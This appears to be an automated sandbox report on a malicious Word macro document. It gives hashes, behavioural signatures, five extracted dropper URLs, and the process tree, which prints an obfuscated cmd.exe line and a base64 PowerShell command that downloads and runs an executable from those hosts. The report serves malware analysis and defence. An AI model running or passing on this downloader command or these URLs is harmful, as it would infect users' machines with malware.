Analysis

  • max time kernel
    101s
  • max time network
    103s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-06-2024 01:05

General

  • Target

    a774d6487dc1a0649813a124beffebdd_JaffaCakes118.doc

  • Size

    93KB

  • MD5

    a774d6487dc1a0649813a124beffebdd

  • SHA1

    ed860962c0c6bdb2146ce75af56e094dbfa7e4ce

  • SHA256

    8d9e4d35475f67fa6a7afd266223740d67c834b848d2f410d783ef834531700e

  • SHA512

    28b0d6493a9cdd2444955c977118c94ca1d47d75cd8a8eed354bad724fb47c92f755acd7808d228b94e2950db5155a0eb10de2eba3f3f550a07ed6a0b1ce9033

  • SSDEEP

    1536:xptJlmrJpmxlRw99NBL+aL+PkEaaXQiFKLd:vte2dw99fykBaXQi

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://webmounts.co.ke/rmFksbPG

exe.dropper

http://pengacaraperceraian.pengacaratopsurabaya.com/s6

exe.dropper

http://wp1.lukas.fr/9lvv9kkr

exe.dropper

http://marbdobrasil.com/3X

exe.dropper

http://repro4.com/website/wp-content/uploads/Hbdsm

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a774d6487dc1a0649813a124beffebdd_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1512
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /V^:On/C " ^S^et ^ ^ ^ ^s^57W=A^AC^A^g^A^A^IA^AC^AgA^AIA^AC^A^g^AAIAAC^Ag^A^AIA^ACA^gAA^IAACA^g^AQf^A0HA7B^AaAMGA0B^QYAMGA^9BwO^A^sG^A^h^B^QZ^AI^HA^iB^w^OA8G^A^m^Bgc^A^QCA^gA^Qb^A^UG^A0BQ^SA0CAl^B^w^aA8GA^2^BgbAkE^A7^AQ^KA^8^G^AmBgcAQC^A^gAAL^Ak^F^AvBQ^SAQC^A^oAQ^Z^A^wG^A^pB^gRAQGA^hB^wb^Aw^GAuBwdA^8^GA^EB^gLA^I^GA^0BwSAQCA^7^BQ^e^A^I^HA^0B^w^e^AkC^Av^BQT^A^oGAkA^AI^A4G^ApB^A^IA^kF^AvBQSA^QC^A^o^AA^aA^M^GAh^B^Q^Z^AIH^Av^B^g^ZA^sD^AnA^QZ^A^g^H^A^l^Bg^L^AcCArA^AR^AIGA^i^BA^JA^sCAn^A^AXAcC^ArA^wYAk^GAs^BgY^A^UH^A^wBg^OA^Y^H^A^uBQ^ZA^QCA^9^Aw^b^AYG^A^y^B^AJ^As^D^AnAQN^AA^DAx^Aw^J^AAC^A9AA^I^AQE^Ai^Bg^Y^A^QC^A7^AQ^KAcC^A^A^Bw^J^A^gCA^0BQa^A^wGAwB^w^UA^4CAn^A^Qb^A^M^H^Ak^Bg^Y^A^gE^Av^AwcA^Q^G^AhB^wbA^w^GAwBQ^d^A^8CA^0^B^g^bAUG^A^0^Bg^bA^8G^AjBQ^L^AAHA3BwLAU^G^A0B^QaAMHAi^BQ^ZAcHAvA^Q^bA8G^Aj^B^gL^A^Q^D^Av^Bgc^A^A^HAl^Bgc^A8C^Av^Ag^O^AA^H^A^0BAd^Ag^G^AA^BA^W^A^MDAvA^QbA^8GAj^B^gLA^w^G^A^pB^wcA^EGAy^B^g^Y^A8G^Ak^B^gY^A^IH^Ah^BQb^A^8CAvAg^O^A^A^H^A^0BAd^A^g^GA^A^Bgc^A^s^G^Ar^B^QOAYHA^2^BAb^A^kDAvAgc^A^Y^G^A^u^Awc^A^E^GAr^B^Qd^A^wG^AuA^Q^MAA^HA3^BwLA^8CA^6^A^AcAQHA0^BAaAAEA2A^wcA8C^At^B^wbA^M^G^AuA^QYA^kH^A^h^Bg^YAE^G^AyBQ^dA^M^H^Aw^B^w^bAQ^H^Ah^BgcAE^GA^jB^QYAc^G^A^u^B^QZ^A^A^H^Au^A^g^bAE^G^Ap^BQ^Y^AI^H^A^l^B^w^Y^AI^H^A^l^B^AcAE^G^A^yBQ^YA^M^G^AhB^wZ^A4^G^A^lB^Ac^A8C^Av^AgOAA^HA^0B^A^d^A^gGAA^B^wRAA^F^AiB^wc^As^G^A^G^B^Q^bA^I^HAv^AQZA^sG^Au^Aw^b^AM^GAu^AwcA^Q^H^A^uB^QdA8G^At^B^g^YAU^G^A^3B^wLA8CA6AAc^AQ^HA0B^Aa^AcCA^9A^wbA0EA^q^BA^J^AsDA0B^g^b^A^UG^ApBA^b^AM^E^A^iBQZ^AcF^Au^A^A^dAU^G^A^O^BAIAQHA^jBQ^Z^A^oGA^i^B^wbA0CA3^BQZA^4^G^A^9A^g^YA^Q^H^AL^BA^J^ ^e- ^l^l^eh^sr^ewo^p& f^oR /^L %^G ^IN (^ ^ ^ ^10^61,^ ^ ^-1^ ^ ^ ^,^ 0 ^ ^ )d^O ^sE^t ^t^Kz=!^t^Kz!!^s^57W:~ %^G, 1!&& ^i^F %^G L^E^Q ^0 ca^l^L %^t^Kz:~^ ^ ^-^1^062% "
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2800
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e JABLAHQAYgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABqAE0AbwA9ACcAaAB0AHQAcAA6AC8ALwB3AGUAYgBtAG8AdQBuAHQAcwAuAGMAbwAuAGsAZQAvAHIAbQBGAGsAcwBiAFAARwBAAGgAdAB0AHAAOgAvAC8AcABlAG4AZwBhAGMAYQByAGEAcABlAHIAYwBlAHIAYQBpAGEAbgAuAHAAZQBuAGcAYQBjAGEAcgBhAHQAbwBwAHMAdQByAGEAYgBhAHkAYQAuAGMAbwBtAC8AcwA2AEAAaAB0AHQAcAA6AC8ALwB3AHAAMQAuAGwAdQBrAGEAcwAuAGYAcgAvADkAbAB2AHYAOQBrAGsAcgBAAGgAdAB0AHAAOgAvAC8AbQBhAHIAYgBkAG8AYgByAGEAcwBpAGwALgBjAG8AbQAvADMAWABAAGgAdAB0AHAAOgAvAC8AcgBlAHAAcgBvADQALgBjAG8AbQAvAHcAZQBiAHMAaQB0AGUALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvAEgAYgBkAHMAbQAnAC4AUwBwAGwAaQB0ACgAJwBAACcAKQA7ACQAYgBiAEQAIAA9ACAAJwAxADAANQAnADsAJAByAGYAbwA9ACQAZQBuAHYAOgBwAHUAYgBsAGkAYwArACcAXAAnACsAJABiAGIARAArACcALgBlAHgAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQASQBvAFkAIABpAG4AIAAkAGoATQBvACkAewB0AHIAeQB7ACQASwB0AGIALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQASQBvAFkALAAgACQAcgBmAG8AKQA7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAcgBmAG8AOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AH0AfQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:332

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD7242.tmp\gb.xsl

    Filesize

    262KB

    MD5

    51d32ee5bc7ab811041f799652d26e04

    SHA1

    412193006aa3ef19e0a57e16acf86b830993024a

    SHA256

    6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

    SHA512

    5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s22qnqq5.rrq.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/332-42-0x000001B76DD40000-0x000001B76DD62000-memory.dmp

    Filesize

    136KB

  • memory/1512-8-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-0-0x00007FF9B6710000-0x00007FF9B6720000-memory.dmp

    Filesize

    64KB

  • memory/1512-1-0x00007FF9B6710000-0x00007FF9B6720000-memory.dmp

    Filesize

    64KB

  • memory/1512-21-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-7-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-19-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-2-0x00007FF9B6710000-0x00007FF9B6720000-memory.dmp

    Filesize

    64KB

  • memory/1512-10-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-11-0x00007FF9B4100000-0x00007FF9B4110000-memory.dmp

    Filesize

    64KB

  • memory/1512-12-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-13-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-14-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-15-0x00007FF9B4100000-0x00007FF9B4110000-memory.dmp

    Filesize

    64KB

  • memory/1512-17-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-16-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-18-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-552-0x00007FF9B6710000-0x00007FF9B6720000-memory.dmp

    Filesize

    64KB

  • memory/1512-5-0x00007FF9B6710000-0x00007FF9B6720000-memory.dmp

    Filesize

    64KB

  • memory/1512-9-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-34-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-36-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-35-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-6-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-4-0x00007FF9F672D000-0x00007FF9F672E000-memory.dmp

    Filesize

    4KB

  • memory/1512-3-0x00007FF9B6710000-0x00007FF9B6720000-memory.dmp

    Filesize

    64KB

  • memory/1512-528-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-529-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-530-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-531-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-532-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-550-0x00007FF9B6710000-0x00007FF9B6720000-memory.dmp

    Filesize

    64KB

  • memory/1512-551-0x00007FF9B6710000-0x00007FF9B6720000-memory.dmp

    Filesize

    64KB

  • memory/1512-553-0x00007FF9B6710000-0x00007FF9B6720000-memory.dmp

    Filesize

    64KB

  • memory/1512-20-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB

  • memory/1512-554-0x00007FF9F6690000-0x00007FF9F6885000-memory.dmp

    Filesize

    2.0MB